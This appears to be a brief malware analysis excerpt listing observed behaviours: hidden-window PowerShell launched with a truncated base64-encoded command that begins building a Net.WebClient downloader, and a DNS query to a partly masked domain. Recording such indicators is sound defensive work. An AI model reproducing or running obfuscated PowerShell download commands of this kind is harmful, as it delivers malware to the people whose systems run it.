Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAF8ANQA2ADUAOAAxADMAPQAoACcAVQBfADQAOAA4ACcAKwAnAF8AOQAnACsAJwBfACcAKQA7ACQATAA3AF8ANAAxADkAOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAF8AMgA2AF8AXwA9AC...
- DNS ASK fi###maal.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAF8ANQA2ADUAOAAxADMAPQAoACcAVQBfADQAOAA4ACcAKwAnAF8AOQAnACsAJwBfACcAKQA7ACQATAA3AF8ANAAxADkAOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAF8AMgA2AF8AXwA9AC...' (with hidden window)